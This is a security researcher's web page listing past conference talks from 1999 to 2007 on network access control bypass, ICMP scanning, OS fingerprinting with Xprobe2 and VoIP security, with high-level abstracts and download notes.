Past Conferences

Defcon 15
August 3-5, 2007
Las Vegas, NV
http://www.defcon.org
Topic: kNAC!

Download: Available [~2.5mb]

2007 GFIRST National Conference
June 25-29, 2007
Orlando, Florida
http://www.us-cert.gov/GFIRST/
Topic: Bypassing NAC (II)

Download: Available [~2.5mb]

ShmooCon 07
March 23 – 25, 2007
Washington, D.C.
http://www.shmoocon.org
Topic: Bypassing NAC Part II

Download: Available [~3.6mb]

EUSecWest 2007
March 1 – March 2
London, England
http://www.eusecwest.com
Topic: Bypassing Network Access Control (NAC) Systems

Download: Available [~3.6mb]

Blackhat Federal 2007
February 28 – March 1
Washington, D.C., USA
http://www.blackhat.com/html/bh-dc-07/bh-dc-07-index.html
Topic: Bypassing Network Access Control (NAC) Systems

Observatoire de la Sécurité des Systèmes d’Information et des Réseaux (OSSIR)
February 5, 2007
Paris, France
http://www.ossir.fr/windows/calendrier/index2006-2007.shtml
Topic: Bypassing Network Access Control (NAC) Systems

Black Hat USA 2006 Briefings and Training
August 2-3, 2006
Caesars Palace, Las Vegas, USA
http://www.blackhat.com/

Topic: Bypassing Network Access Control Systems (NAC)

Download: Download Presentation [~1.5mb]

The threat of viruses, worms, information theft and lack of control of the IT infrastructure lead companies to implement security solutions to control the access to their internal IT networks.

A new breed of software (Sygate, Microsoft, etc.) and hardware (Cisco, Vernier Networks, etc.) solutions from a variety of vendors has emerged recently. All are tasked with one goal ׀ controlling the access to a network using different methods and solutions.

This presentation will examine the different strategies used to provide with network access controls.

Flaws associated with each and every NAC solution presented would be presented. These flaws allows the complete bypass of each and every network access control mechanism currently offered on the market.

IT Defense
February 1-3, 2006
Dresden, Germany
http://www.it-defense.de/

Topic: Next Generation Infrastructure Discovery

Download: Not Available

An enterprise IT infrastructure is a complex and a dynamic environment that is generally described as a black hole by its IT managers. The knowledge about an enterprise network’s layout (topology), resources (availability and usage), elements residing on the network (devices, applications, their properties and the interdependencies among them) as well as the ability to maintain this knowledge up-to-date, are all of critical for managing and securing IT assets and resources.

Unfortunately, the current available network discovery technologies (active network discovery and passive network discovery) suffer from numerous technological weaknesses which prevent them from providing with complete and accurate information about an enterprise IT infrastructure. Their ability to keep track of changes is unsatisfactory at best.

The inability to “know” the network directly results with the inability to manage and secure the network in an appropriate manner. This is since it is impossible to manage or to defend something, or against something, its existence is unknown or that only partial information about it exists.

The first part of the talk presents the current available network discovery technologies, active network discovery and passive network discovery, and explains their strengths and weaknesses. The talk highlights technological barriers, which cannot be overcome, with open source and commercial applications using these technologies.

The second part of the talk presents a new hybrid approach for infrastructure discovery, monitoring and control. This agent-less approach provides with real-time, complete, granular and accurate information about an enterprise infrastructure. The underlying technology of the solution enables maintaining the information in real-time, and ensures the availability of accurate, complete and granular network context for other network and security applications.

During the talk new technological advancements in the fields of infrastructure discovery, monitoring and auditing will be presented.

Defcon 13
July 29-31, 2005
Alexis Park, Las Vegas, USA
http://www.defcon.org/

Topic: On the Current State of Remote Active OS Fingerprinting

Download Presentation [~660kb]

Active operating system fingerprinting is a technology, which uses stimulus (sends packets) in order to provoke a reaction from network elements. The implementations of active scanning will monitor the network for a response to be, or not, received from probed targeted network elements, and according to the type of response, and the conclusions following (part of an implementation’s intelligence), knowledge will be gathered about the underlying operating system.

This talk examines the current state of remote active OS fingerprinting technology and tools: the different methods used today, the issues associated with them, the limitations, where the current technology is, what can and cannot be accomplished, and what should be done in the future.

The talk also highlights the accuracy aspects of several active operating system fingerprinting tools, analyzes them and compare between them.

During the talk a new version of Xprobe2, a remote active OS fingerprinting tool will be released.

Black Hat USA 2005 Briefings and Training
July 27-28, 2005
Caesars Palace, Las Vegas, USA
http://www.blackhat.com/

Topic: A New Hybrid Approach for Infrastructure Discovery, Monitoring and Control

An enterprise IT infrastructure is a complex and a dynamic environment that is generally described as a black hole by its IT managers. The knowledge about an enterprise network’s layout (topology), resources (availability and usage), elements residing on the network (devices, applications, their properties and the interdependencies among them) as well as the ability to maintain this knowledge up-to-date, are all of critical for managing and securing IT assets and resources.

Unfortunately, the current available network discovery technologies (active network discovery and passive network discovery) suffer from numerous technological weaknesses which prevent them from providing with complete and accurate information about an enterprise IT infrastructure. Their ability to keep track of changes is unsatisfactory at best.

The inability to “know” the network directly results with the inability to manage and secure the network in an appropriate manner. This is since it is impossible to manage or to defend something, or against something, its existence is unknown or that only partial information about it exists.

The first part of the talk presents the current available network discovery technologies, active network discovery and passive network discovery, and explains their strengths and weaknesses. The talk highlights technological barriers, which cannot be overcome, with open source and commercial applications using these technologies.

The second part of the talk presents a new hybrid approach for infrastructure discovery, monitoring and control. This agent-less approach provides with real-time, complete, granular and accurate information about an enterprise infrastructure. The underlying technology of the solution enables maintaining the information in real-time, and ensures the availability of accurate, complete and granular network context for other network and security applications.

During the talk new technological advancements in the fields of infrastructure discovery, monitoring and auditing will be presented.

CSI NetSec 2005
June 13-15, 2005
The Phoenician, Scottsdale, Arizona, USA
http://www.gocsi.com/netsec/

Topic: Next Generation Infrastructure Discovery, Monitoring, and Auditing

IT Underground
February 17-18, 2005.
Prague Conference Center, Prague, Czech Republic.

Topic: On the accuracy of active OS fingerprinting tools

Download: Download Presentation [~495kb]

Active operating system fingerprinting is a technology, which uses stimulus (sends packets) in order to provoke a reaction from network elements. The implementations of active scanning will monitor the network for a response to be, or not, received from probed targeted network elements, and according to the type of res ponse, and the conclusions following (part of an implementation’s intelligence), knowledge will be gathered about the underlying operating system.

The talk also highlights the accuracy aspects of several active operating system fingerprinting tools, analyzes them and compare between them.

AusCERT 2004
May 23-27, 2004.
Royal Pines Resort, Gold Coast, Australia.

Topic: Why E.T. Can’t Phone Home? – Security Risk Factors with IP Telephony

Download: Download Presentation [~600kb]

“…it is no longer necessary to have a separate network for voice…”

IP Telephony based networks, which will be a core part of our Telephony infrastructure in the future, introduce caveats and security concerns which traditional telephony based networks do not have to deal with, have long forgotten about, or have learned to cope with. The security risk is usually overshadowed by the technological hype and the way IP Telephony equipment manufacturers push the technology to the masses. The presentation highlights the different security risk factors with IP Telephony based networks.

Among the issues we will be examining are free phone calls, call hijacks, call tracking, manipulation of conversations, fraud (and detection) and other interesting topics.

Black Hat Federal
October 1-2, 2003.
The Sheraton Premiere at Tyson’s Corner, Virginia, USA.

Topic: Using Xprobe2 in a Corporate Environment

Download: Download Presentation [~600kb]

Xprobe2 is a remote active operating system fingerprinting tool with a different approach to operating system fingerprinting.

The latest version of Xprobe2 was released at Black Hat USA 2003.

The talk will present the way Xprobe2 operates, its usage scenarios, and how Xprobe2 overcomes several issues effecting active operating system fingerprinting.

The talk will present the issues effecting traditional active operating system fingerprinting and how these issues directly effects the results different active operating system fingerprinting tools, relying on these methods, produce.

New advancements in the field of active operating system fingerprinting, which greatly enhance the accuracy of Xprobe2, will also be presented.

Examples and usage scenarios will be discussed. The main emphasis will be on how to benefit the most from using Xprobe2, and how to perform corporate wide network auditing using Xprobe2.

The talk will explain why accurate operating system fingerprinting is an extremely important stage in auditing and in nearly any network security related process.

Finally, Xprobe2’s future development plan will be discussed.

Black Hat USA 2003 Briefings
July 28th-31th, 2003.
Caesers Palace, Las Vegas, Nevada, USA.

Topic: Revolutionizing Operating System Fingerprinting

Download: Power Point Presentation [~3.3mb]

Xprobe is an active operating system fingerprinting tool, which was officially released two years ago at the Blackhat briefings USA 2001. The first version of the tool was a proof of concept for the methods introduced in the “ICMP Usage in Scanning” project, which I have conducted. Two years after, and several versions later (mainly Xprobe2 v0.1 release), this talk would examine several issues with operating system fingerprinting we (Fyodor Yarochkin and myself) have encountered during the development of Xprobe and Xprobe2.

Mainly the talk will explain why traditional operating system fingerprinting methods suffer from a number of caveats, and how these issues directly affects the results different operating system fingerprinting tools relying on these methods produce (these issues will be explained along with different examples).

During the talk I will introduce several advancements in the field of operating system fingerprinting. The methods introduced greatly enhance the accuracy of operating system fingerprinting. Several new ways to gather information about a host OS will be uncovered along with ways to overcome many of the current issues of active operating system fingerprinting methods.

During the talk examples will be given, and the audience will be encouraged to participate in a discussion.

A paper release, and a new version of Xprobe2 will accommodate the talk.

Defcon XI
August 1st-3rd, 2003.
Alexis Park, Las Vegas, Nevada, USA.

Topic: Revolutionizing Operating System Fingerprinting

Download: Power Point Presentation [~3.3mb]

Xprobe is an active operating system fingerprinting tool, which was officially released two years ago at the Blackhat briefings USA 2001. The first version of the tool was a proof of concept for the methods introduced in the “ICMP Usage in Scanning” project, which I have conducted. Two years after, and several versions later (mainly Xprobe2 v0.1 release), this talk would examine several issues with operating system fingerprinting we (Fyodor Yarochkin and myself) have encountered during the development of Xprobe and Xprobe2.

Mainly the talk will explain why traditional operating system fingerprinting methods suffer from a number of caveats, and how these issues directly affects the results different operating system fingerprinting tools relying on these methods produce (these issues will be explained along with different examples).

During the talk I will introduce several advancements in the field of operating system fingerprinting. The methods introduced greatly enhance the accuracy of operating system fingerprinting. Several new ways to gather information about a host OS will be uncovered along with ways to overcome many of the current issues of active operating system fingerprinting methods.

During the talk examples will be given, and the audience will be encouraged to participate in a discussion.

A paper release, and a new version of Xprobe2 will accommodate the talk.

Hivercon
November 26-27, 2002.
The Burlington Hotel, Dublin, Ireland.

Topic: Why E.T. Can’t Phone Home? – Security Risk Factors with IP Telephony-based Networks

Download: Power Point Presentation [~520kb]

IP Telephony based networks, which might be a core part of our Telephony infrastructure in the near future, introduce caveats and security concerns which traditional telephony based networks do not have to deal with, have long forgotten about, or have learned to cope with. The security risk is usually overshadowed by the technological hype and the way IP Telephony equipment manufacturers push the technology to the masses. The presentation highlights the different security risk factors with IP Telephony based networks.

Defcon X
August 2nd – August 4th, 2002.
Alexis Park Hotel and Resort in Las Vegas, Nevada, USA.

Topic: Xprobe, The Year After

Download: Power Point Presentation [~5mb]

Xprobe, written and maintained by Fyodor Yarochkin & Ofir Arkin, is an active operating system fingerprinting tool based on Ofir Arkin’s “ICMP Usage in Scanning” research project (http://www.sys-security.com). Last year at the Blackhat briefings, July 2001, the first generation of Xprobe was released.The tool’s first generation (Xprobe v0.0.1) relies on a hard coded static-based logic tree. Although it has a lot of advantages (1-4 packets only, accurate, fast, efficient, etc.) the tool suffers from a major drawback – its logic is static.At Defcon 10 we will be releasing Xprobe2, a complete re-written active operating system fingerprinting tool with a different approach to operating system fingerprinting. Xprobe2 rely on fuzzy signature matching, probabilistic guesses, multiple matches simultaneously, and a signature database.As with the previous year – Don’t miss the demonstration!

Black Hat Briefings USA 2002
July 31 – August 1, 2002.
Caesars Palace, Las Vegas, NV, USA.

Topic: E.T. Can’t Phone Home – VoIP Security

Download: Power Point Presentation [~9.5mb]

“…it is no longer necessary to have a separate network for voice…”Voice over IP (VoIP) is the next generation of telecommunications. It is combined from singling protocols (which establish, modify, and tear-down sessions), media transfer protocols (which carry the voice samples), and supporting protocols (which support the other two protocols with services they need such as routing, DNS, etc).Security issues with VoIP based protocols are less highlighted than the hype about the technology. This talk will be focusing on the Security issues with the Session Initiation Protocol (SIP), a signaling protocol that is the crown contender of H.323, and with the Real-Time Transport Protocol (RTP) which is the most common vessel for carrying voice samples.The presentation will highlight ways to take advantage of the design of these protocols. The talk will also examine ways to bypass any element in a VoIP architecture based on the Session Initiation Protocol. Among the issues we will be examining are free phone calls, call hijacks, call tracking, manipulation of conversations, fraud (and detection) and other gizmos.

Black Hat Briefings USA 2002 – Training
July 30, 2002.
Caesars Palace, Las Vegas, NV, USA.
Topic: Advanced Scanning Techniques with ICMP

ICMP (or in its full name the Internet Control Message Protocol) looks harmless at first glance. In terms of Security ICMP is one of the most controversial protocols within the TCP/IP protocol suite.This workshop will be an in depth theoretical and hands-on experience with the TCP and UDP stepbrother – the ICMP protocol, and its usage in Scanning.Scanning will be only a portion of this workshop…Part One: ICMP protocol’s basics.

We will cover how messages differ from one another, where we expect to see them on a network, and most important- when; the explanation of the circumstances in which each ICMP message is generated (with ICMP error messages we will be e xplaining what the different triggers are for this message generation and what network problems contributes to each one of them); and the security problems associated with each and every ICMP message.We will be covering security related topics such as:

  • Denial of Service
  • Spoofing
  • Covert Channels
  • Traffic Abnormalities (we will learn how to differentiate between legitimate and non-legitimate traffic)
  • Profiling Traffic and more.

Much of the TCP/IP protocol suite’s networking phenomenon will also be explored. It will include Host, Server and Router behaviors that people may experience in a day to day operation of their networks- both from the networking stand point (Routers & Switches) and from a security stand point (IDS, Firewalls, etc).Part Two: The usage of ICMP for Active Scanning.

This section will begin with some basic Host Detection methods and will illustrate unique situations where ICMP error messages will help a malicious party. This will include a demonstration of Host-based security methods with several operating systems, and will illustrate why some of the OSs do not provide the user with enough tools to achieve a complete Host-based security solution.

There will be more in-depth explanations and demonstrations of Advanced Host Detection methods that aim to use traffic that will trigger ICMP error messages back from a probed machine/IP range. Some of the methods allow the detection of filtering mechanisms as well as access control lists (ACL) schemes. Also included is a demonstration on how some Firewalls fail to block packets with mangled values inside the IP Header and how these packets help us in detecting certain hosts behind a protecting firewall.

We will cover methods that take advantage of Router (and level 3 aware switches) functionality and aid a malicious party to map a network.

strong>Active operating system fingerprinting methods using the ICMP protocol will be examined and explained. The methods, discovered by the ICMP Project, will allow a malicious party as well as an auditor or an administrator to accurately identify the flavor of an operating system using a very low number of packets sent (usually one). Some of the usages for active operating system fingerprinting may include auditing your networks for illegal installations of unauthorized operating systems.

For example, we will explore methods that will allow us to identify and differentiate between all of the different Microsoft based operating system flavors.

We will focus on our ability to combine several active operating system fingerprinting methods together so a better, faster, and more accurate process of active system fingerprinting will be in our auditing tools set.

Part Three: Ways to identify the different methods of active operating systems fingerprinting using the ICMP protocol with the help of Snort, a free IDS utility. An explanation of Snort will be given, as well as how to write a rule base for this awesome IDS open source utility.

Part Four: Passive operating system fingerprinting using the ICMP protocol.

We will go through the basics of passive fingerprinting and what power it gives to those who use it. We will explore the types of information one might glean from a network (application wise, operating system identification wise, etc). We will be looking at a demonstration of the Microsoft way of implementing ICMP within their different operating systems and how this helps us to passively differentiate between them all.

Part Five: Ways to build a proper firewall rule base and mechanisms to prevent most of the methods introduced in the workshop.

Part Six: Examining the subject of traffic profiling and ways we can use it to enhance our overall network security (not only regarding ICMP).

The students will be given the newest version of the ICMP Usage in Scanning research paper, version 4.0, which will be released at the Black Hat Briefings, as well as a CD ROM containing all tools and papers discussed during the training.

CanSecWest/Core02
May 1-3, 2002.
Sheraton Wall Centre, Vancouver B.C., Canada.
Topic: VoIP – The Next Generation of Phreaking

Download: Power Point Presentation

Security issues with VoIP based protocols are less highlighted than the hype about the technology. This talk will be focusing on the Security issues with the Session Initiation Protocol (SIP), a signaling protocol that is the crown contender of H.323, and with the Real-Time Transport Protocol (RTP) that is the most common vessel for carrying voice samples.Some of the issues I will be covering are free phone calls, call hijacks, call tracking, manipulation of conversations, etc.

The Black Hat Windows Security 2002 Briefings
February 7-8, 2002.
Radisson Hotel New Orleans, New Orleans, LA, USA.

Topic: VoIP – The Next Generation of Phreaking

Download: Not Available
Welcome to the next generation of security hazards and problems inherited from the usage of one network for both Data and Voice. Welcome to the world of IP Based Telephony (and Internet Telephony) which, not only, provide exciting new technologies, but a new challenge for the security community in securing these networks.Along with new technologies come their security problems. Some security problems inherited from the usage of IP based networks, some (new) result from design flaws and complexity of protocols and implementation, and some result from the combination of both worlds – Telephony and IP.This talk will also examine several scenarios for deployment of VoIP from several architectural angles – the Internet, a corporate, an ITSP, and a Telecom company. With each and every scenario the security problems will be highlighted and security design tips will be given.

The Black Hat Windows Security 2002 Briefings – Training
February 5-6, 2002.
Radisson Hotel New Orleans, New Orleans, LA, USA.
Topic: Advanced Scanning Techniques with ICMP

The Black Hat Briefings Europe 2001
November 21-22, 2001.
Golden Tulip Grand – The Krasnapolsky, Amsterdam, The Netherlands.

Topic: X – Remote ICMP Based OS Fingerprinting Techniques

X is a logic which combines various remote active operating system fingerprinting methods using the ICMP protocol, which were discovered during the “ICMP Usage in Scanning” research project, into a simple, fast, efficient and a powerful way to detect an underlying operating system a targeted host is using.

Xprobe written and maintained by Fyodor Yarochkin (fygrave@tigerteam.net) and Ofir Arkin (ofir@sys-security.com) is a tool that automates X.

I will be explaining the tool’s inner working and the various active OS fingerprinting methods with the ICMP protocol implemented and used with the tool. I will demonstrate the tool’s abilities, its advantages, and future plans. I will also cover the enhancements made to the tool since its lunch (Black Hat Briefings ’01, July 2001).

The tool’s limitations, ways to detect its usage, and how to defend ourselves from its abilities will also be discussed. Future plans and enhancements, which include a different approach to OS detection, will also be presented.

The Black Hat Briefings Europe 2001 – Training
November 19-20, 2001.
Golden Tulip Grand – The Krasnapolsky, Amsterdam, The Netherlands.

Topic: Advanced Scanning Techniques with ICMP

The Internet Control Message (ICMP) Protocol may seem harmless at first glance. In terms of security, ICMP is one of the most controversial protocols in the TCP/IP protocol suite.

This workshop will be an in depth theoretical and hands on experience with the ICMP protocol, and its usage in Scanning.

We will start by explaining the protocol’s basics and characteristics. We will explain the circumstances in which each ICMP message is being generated, and with ICMP error messages, what was the trigger to send those. We will be explaining where and why to expect to see ICMP messages, and in which segments of your network. We will go over security hazards (such as D.o.S., Covert Channels and more) with each ICMP message. This part of the training explains a lot of phenomenon with TCP/IP networking.

We will explain some basic Host Detection methods. We will not only concentrate on ICMP query messages, we will also examine some unique situations where a simple ICMP error message will carry more than enough information for the malicious computer attacker.

We will cover host-based security methods and explain why these measures are not enough. Next we will overview methods in which aim to trigger ICMP error messages back from the probed IP addresses. Some of these Advanced Host Detection methods will allow us to detect the presence of a filtering device, and even to learn and understand the ACL scheme a filtering device is forcing on a protected network. We will also learn why, in some cases, firewalls fail to understand that values inside the IP header where mangled. We will have a live demonstration with one of the leading firewall products in the market today. Methods, which take advantage of Router functionality, and aid a prober in unique circumstances, will also be examined.

Active operating system fingerprinting methods using the ICMP protocol, discovered by the ICMP project, will be examined and explained. We will examine the methods that allow us to clearly identify a flavor of an operating system. We will demonstrate methods that will allow us to fingerprint and differentiate between Linux, Sun Solaris, Microsoft (all flavors), HPUX, AIX, FreeBSD, Ultrix, and other OSs based machines. For example, we will demonstrate how we can differentiate between all the different flavors of Microsoft based operating systems. We will be using a set of tools to generate the queries and examine the different behavioral patterns we produce from the servers in the class. We will focus on our ability to combine everything together, and how this makes the process of operating system identification and fingerprinting more efficient and simple (even better than common methods being used in the computer security field today).

We will learn ways to identify the different methods of active OS fingerprinting using the ICMP protocol with the help of Snort, a free IDS utility.

The subject of Passive Fingerprinting using the ICMP protocol will be explained and demonstrated. We will examine the Microsoft way of implementing the ICMP protocol and how this helps us to fingerprint all of the Microsoft based operating systems passively. We will also explain how to build a proper firewall rule base that might handle most of the methods introduced.

Defcon 9
July 13-15, 2001.
Alexis Park Hotel and Resort, Las Vegas, USA.

Topic: Introducing X: Playing Tricks with ICMP

During my research with the “ICMP Usage In Scanning” project, I have discovered some new active and passive operating system fingerprinting methods using the ICMP protocol. Methods that are simple, and efficient.The active operating system fingerprinting methods were not correlated into a certain logic. A logic that would allow us to have the ability to use any available method in order to, wisely, actively fingerprint an operating system.

In this talk I will be releasing a new active operating system fingerprinting tool using the active OS fingerprinting methods with the ICMP protocol I have discovered.

I will be explaining the tool’s inner works and the various active OS fingerprinting methods with ICMP implemented and used with the tool.

The tool’s limitations, ways to detect its usage, and how to defend our selves from its abilities will also be discussed.Future plans and enhancements, which include a different approach to OS detection, will be presented as well.

The Black Hat Briefings 2001
July 11-12, 2001.
Caesars Palace, Las Vegas, USA.

Topic: ntroducing X: Playing Tricks with ICMP

During my research with the “ICMP Usage In Scanning” project, I have discovered some new active and passive operating system fingerprinting methods using the ICMP protocol. Methods that are simple, and efficient.The active operating system fingerprinting methods were not correlated into a certain logic. A logic that would allow us to have the ability to use any available method in order to, wisely, actively fingerprint an operating system.

In this talk I will be releasing a new active operating system fingerprinting tool using the active OS fingerprinting methods with the ICMP protocol I have discovered.

I will be explaining the tool’s inner works and the various active OS fingerprinting methods with ICMP implemented and used with the tool.

The tool’s limitations, ways to detect its usage, and how to defend our selves from its abilities will also be discussed.Future plans and enhancements, which include a different approach to OS detection, will be presented as well.

The Black Hat Briefings 2001 – Training
July 9-10, 2001.
Caesars Palace, Las Vegas, USA.

Topic: Advanced Scanning Techniques with ICMP

The Black Hat Briefings 2001
April 26-27, 2001.
Grand Copthorne Waterfront, Singapore.

Topic: ICMP Usage In Scanning (The Advanced Methods)

The ICMP Protocol may seem harmless at first glance. Its goals and features were outlined in RFC 792 (and later cleared in RFCs 1122,1256, 1349, 1812), as a way to provide a means to send error messages.

In terms of security, ICMP is one of the most controversial protocols in the TCP/IP protocol suite. The risks involved in implementing the ICMP protocol in a network are the subject of this lecture…

The Black Hat Briefings 2001 – Training
April 25, 2001.
Grand Copthorne Waterfront, Singapore.

Session Training: Advanced Scanning with ICMP

All you wanted to know about the usage of ICMP in Scanning. This workshop will be an in-depth theoretical and hands-on experience dealing with the ICMP protocol usage in Scanning. Starting with the simplest methods of Host Detection to Operating System Active and Passive fingerprinting…

The Black Hat Briefings 2001
April 23-24, 2001.
Sheraton, Hong Kong.

Topic: ICMP Usage In Scanning (The Advanced Methods)

The ICMP Protocol may seem harmless at first glance. Its goals and features were outlined in RFC 792 (and later cleared in RFCs 1122,1256, 1349, 1812), as a way to provide a means to send error messages. In terms of security, ICMP is one of the most controversial protocols in the TCP/IP protocol suite. The risks involved in implementing the ICMP protocol in a network are the subject of this lecture…

The Black Hat Windows 2k Security Conference
February 14-15, 2001.
Caesars Palace, Las Vegas, USA.

Topic: Active & Passive Fingerprinting of Microsoft Based Operating Systems using the ICMP protocol

The ICMP Protocol may seem harmless at first glance. Its goals and features were outlined in RFC 792 (and later cleared in RFCs 1122,1256, 1349, 1812), as a way to provide a means to send error messages. In terms of security, ICMP is one of the most controversial protocols in the TCP/IP protocol suite. The risks involved in implementing the ICMP protocol in a network, and the ways of using the ICMP protocol to fingerprint Microsoft based operating systems are the subject of this lecture…

The Black Hat Windows 2k Security Conference – Training
February 12-13, 2001.
Caesars Palace, Las Vegas, USA.

Session Training: Advanced Scanning with ICMP

All you wanted to know about the usage of ICMP in Scanning. This workshop will be an in-depth theoretical and hands-on experience dealing with the ICMP protocol usage in Scanning. Starting with the simplest methods of Host Detection to Operating System Active and Passive fingerprinting…

The Second Annual Israeli Security Conference
November 20, 2000.
Dan Panorama Hotel, Tel-Aviv, Israel.

Topic: Identifyng ICMP Hackery Tools

The Black Hat Briefings 2000 Amsterdam
October 23-25, 2000.
Radisson Hotel, Amsterdam.

The ICMP Protocol may seem harmless at first glance. Its goals and features were outlined in RFC 792 (and later cleared in RFCs 1122, 1256, 1822), as a way to provide a means to send error messages.

In terms of security, ICMP is one of the most controversial protocols in the TCP/IP protocol suite. The risks involved in implementing the ICMP protocol in a network are the subject of this lecture.The first topic to be presented will be Host Detection using the various ICMP query message types using some elementary examples.

Next will overview the process of some Advanced Host Detection methods mainly centered in eliciting an ICMP error message back from the probed machines. Methods that allow us to map entire networks and understand ACL filtering devices protecting networks, will be used during the course of the lecture. Some of the above mentioned methods also allow us to bypass weak firewalls.

Recent methods of operating system fingerprinting discovered by the ICMP project (www.sys-security.com) will also be presented. Some of these methods allow a malicious computer attacker to identify Microsoft Windows 2000 machines, and to isolate certain groups of operating systems.New methods currently being researched by Ofir Arkin which deal with Passive Fingerprinting with the ICMP protocol will be discussed as well. At the end of the talk a few minutes will be spent on some considerations necessary for firewall policy design.

The First Israeli Hackers Conference
28-30 March, 2000.
Ganey Hata’rocha, Tel-Aviv, Israel.

Topic: Network Scanning Techniques
http://www.y2hack.com

The First Annual Israeli Security Conference
8-10 November, 1999.
Dan Panorma Hotel, Tel-Aviv, Israel.

Topic: 2 days seminar on Intrusion Techniques & Countermeasures

Advertisements

%d bloggers like this: